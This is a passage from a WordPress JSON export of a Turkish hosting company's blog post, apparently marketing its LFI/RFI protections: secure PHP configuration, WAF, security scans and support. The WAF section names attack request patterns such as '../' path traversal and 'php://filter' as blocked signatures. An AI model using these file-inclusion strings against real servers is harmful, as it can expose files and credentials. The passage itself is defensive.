Bar\u0131nd\u0131rma Altyap\u0131s\u0131 ve Zafiyet Korumas\u0131<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u0130HS Telekom, sunucular\u0131n\u0131 en g\u00fcncel g\u00fcvenlik standartlar\u0131na g\u00f6re yap\u0131land\u0131r\u0131r. PHP ayarlar\u0131, RFI gibi bilinen riskleri en aza indirecek \u015fekilde optimize edilmi\u015ftir. \u0130ster payla\u015f\u0131ml\u0131 bir <a href=\"https:\/\/www.ihs.com.tr\/web-hosting\/wordpress-hosting.html\" target=\"_blank\">WordPress hosting<\/a> paketi, ister esnek bir <a href=\"https:\/\/www.ihs.com.tr\/sunucu-kiralama\/vps-server.html\" target=\"_blank\">VPS<\/a> ya da y\u00fcksek performansl\u0131 bir <a href=\"https:\/\/www.ihs.com.tr\/sunucu-kiralama\/vds-sunucu.html\" target=\"_blank\">VDS<\/a> kullan\u0131n, altyap\u0131m\u0131z potansiyel tehditlere kar\u015f\u0131 s\u00fcrekli olarak izlenir ve g\u00fc\u00e7lendirilir. G\u00fcvenli yap\u0131land\u0131rmalar, zafiyetlerin s\u00f6m\u00fcr\u00fclme olas\u0131l\u0131\u011f\u0131n\u0131 \u00f6nemli \u00f6l\u00e7\u00fcde azalt\u0131r.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Web-Application-Firewall-WAF-Hizmetleri-ile-Proaktif-Koruma\"><\/span>Web Application Firewall (WAF) Hizmetleri ile Proaktif Koruma<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Web Uygulama G\u00fcvenlik Duvar\u0131 (WAF), uygulaman\u0131z ile internet aras\u0131ndaki trafikte bir kalkan g\u00f6revi g\u00f6r\u00fcr. \u0130HS Telekom&#8217;un sundu\u011fu geli\u015fmi\u015f WAF hizmetleri, bilinen LFI ve RFI sald\u0131r\u0131 modellerini (\u00f6rne\u011fin, `..\/` veya `php:\/\/filter` i\u00e7eren istekler) tespit ederek bu zararl\u0131 istekler uygulaman\u0131za ula\u015fmadan \u00f6nce engeller. Bu proaktif koruma katman\u0131, kodunuzda g\u00f6zden ka\u00e7m\u0131\u015f olabilecek zafiyetlere kar\u015f\u0131 etkili bir savunma sa\u011flar.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Duzenli-Guvenlik-Taramalari-ve-Detayli-Raporlama\"><\/span>D\u00fczenli G\u00fcvenlik Taramalar\u0131 ve Detayl\u0131 Raporlama<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>G\u00fcvenlik s\u00fcrekli bir s\u00fcre\u00e7tir. \u0130HS Telekom, m\u00fc\u015fterilerine d\u00fczenli g\u00fcvenlik tarama hizmetleri sunarak web uygulamalar\u0131ndaki potansiyel a\u00e7\u0131klar\u0131 tespit eder. Bu taramalar sonucunda olu\u015fturulan detayl\u0131 raporlar, zafiyetlerin nerede oldu\u011funu ve nas\u0131l d\u00fczeltilece\u011fini net bir \u015fekilde ortaya koyar. Bu sayede, g\u00fcvenlik duru\u015funuzu s\u00fcrekli olarak iyile\u015ftirme imkan\u0131na sahip olursunuz.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Olasi-Saldirilara-Karsi-724-Uzman-Teknik-Destek\"><\/span>Olas\u0131 Sald\u0131r\u0131lara Kar\u015f\u0131 7\/24 Uzman Teknik Destek<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>En iyi koruma \u00f6nlemlerine ra\u011fmen bir g\u00fcvenlik olay\u0131 ya\u015fanmas\u0131 durumunda h\u0131zl\u0131 ve do\u011fru m\u00fcdahale hayati \u00f6nem ta\u015f\u0131r. \u0130HS Telekom&#8217;un 7\/24 hizmet veren uzman teknik destek ekibi, olas\u0131 bir sald\u0131r\u0131 an\u0131nda size yol g\u00f6stermek, sorunun kayna\u011f\u0131n\u0131 tespit etmek ve sisteminizi en k\u0131sa s\u00fcrede g\u00fcvenli hale getirmek i\u00e7in haz\u0131rd\u0131r. Bu destek, kriz anlar\u0131nda i\u015fletmenizin kesintiye u\u011framas\u0131n\u0131 ve veri kayb\u0131 ya\u015famas\u0131n\u0131 \u00f6nler.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Web uygulamalar\u0131, kullan\u0131c\u0131 deneyimini zenginle\u015ftirmek ve dinamik i\u00e7erik sunmak i\u00e7in \u00e7e\u015fitli sunucu tarafl\u0131 i\u015flevselliklere sahiptir. Bu i\u015flevselliklerden biri de dosya ekleme (File&hellip;<\/p>\n","protected":false},"author":3,"featured_media":15630,"comment_status":"open","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[466],"tags":[],"class_list":["post-15629","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bilgi-guvenligi"],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/posts\/15629","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/comments?post=15629"}],"version-history":[{"count":1,"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/posts\/15629\/revisions"}],"predecessor-version":[{"id":15631,"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/posts\/15629\/revisions\/15631"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/media\/15630"}],"wp:attachment":[{"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/media?parent=15629"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/categories?post=15629"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ihs.com.tr\/blog\/wp-json\/wp\/v2\/tags?post=15629"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}